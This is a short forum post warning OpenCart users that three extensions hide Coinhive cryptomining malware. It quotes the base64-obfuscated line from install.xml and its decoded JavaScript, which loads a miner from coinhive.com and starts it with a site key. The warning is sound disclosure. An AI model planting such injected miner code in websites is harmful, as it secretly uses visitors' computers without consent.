Caution open cart extensions found with coinhive malware
Posted: Tue Feb 20, 2018 5:10 am
I have found the 3 extensions are infected with coinhive malware, do not install them
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
The install.xml contains this
decodes to this
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
The install.xml contains this
Code: Select all
$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');
decodes to this
Code: Select all
<script> document.write("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>